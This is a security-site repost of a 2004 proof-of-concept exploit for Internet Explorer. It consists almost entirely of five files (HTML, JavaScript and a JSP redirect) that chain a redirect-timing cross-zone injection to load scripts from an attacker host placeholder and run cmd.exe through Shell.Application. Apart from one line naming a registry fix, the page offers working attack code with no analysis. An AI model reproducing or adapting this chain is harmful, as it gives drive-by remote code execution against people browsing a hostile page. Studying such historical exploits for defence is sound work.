首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft IE Remote Application.Shell Exploit
来源:vfocus.net 作者:Jelmer 发布时间:2004-07-09  

Microsoft Internet Explorer Remote Application.Shell Exploit

Proof of Concept Exploit by Jelmer
Solution : The IEFix.reg registry file will protect you from this new variant/exploit

----------------------------------------------------- installer.htm -------------------------------------------------------
<html>
<body>

<script language="Javascript">

function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;
dialogWidth:1\;").location="vbscript:\"<SCRIPT SRC='http://ip/shellscript_loader.js'><\/script>\"";
}

</script>

<script language="javascript">

setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100);
setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101);
document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.jsp" style=display:none;></IFRAME>');

</script>

</body>
</html>

--------------------------------------------------------- md.htm ---------------------------------------------------------
<SCRIPT language="javascript">

window.returnValue = window.dialogArguments;

function CheckStatus(){
try{tempVar=window.dialogArguments.location.href;}catch(e){window.close();}
setTimeout("CheckStatus()",100);
}

CheckStatus();

</SCRIPT>

--------------------------------------------------- shellscript_loader.js ---------------------------------------------------
function getRealShell() {
myiframe.document.write("<SCRIPT SRC='http://ip/shellscript.js'><\/SCRIPT>");
}

document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200 HEIGHT=200></IFRAME>");
setTimeout("getRealShell()",100);

------------------------------------------------------- shellscript.js -------------------------------------------------------
function injectIt() {
document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<script language=
"JScript" DEFER>var obj=new ActiveXObject("Shell.Application");obj.ShellExecute("cmd.exe","/c pause");</script>');
}
document.write('<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);

--------------------------------------------------------- redir.jsp ----------------------------------------------------------
<% Thread.sleep(1500);
response.setStatus(302);
response.setHeader("Location", "URL:res://shdoclc.dll/HTTP_501.htm");
%>



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FreeBSD Local DoS Exploit
·MySQL Authentication Bypass Ex
·phpMyAdmin PHP Code Injection
·Microsoft IE Remote Wscript.Sh
·MPlayer GUI filename handling
·Win2k Utility Manager Privileg
·Windows XP UPNP exploit
·MPlayer buffer overflow for UN
·Rlpr <=2.04 msg() Remote fo
·Win2k Universal language Utili
·PoC poisoning cache attack SEF
·Win2k Utility Manager all in o
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved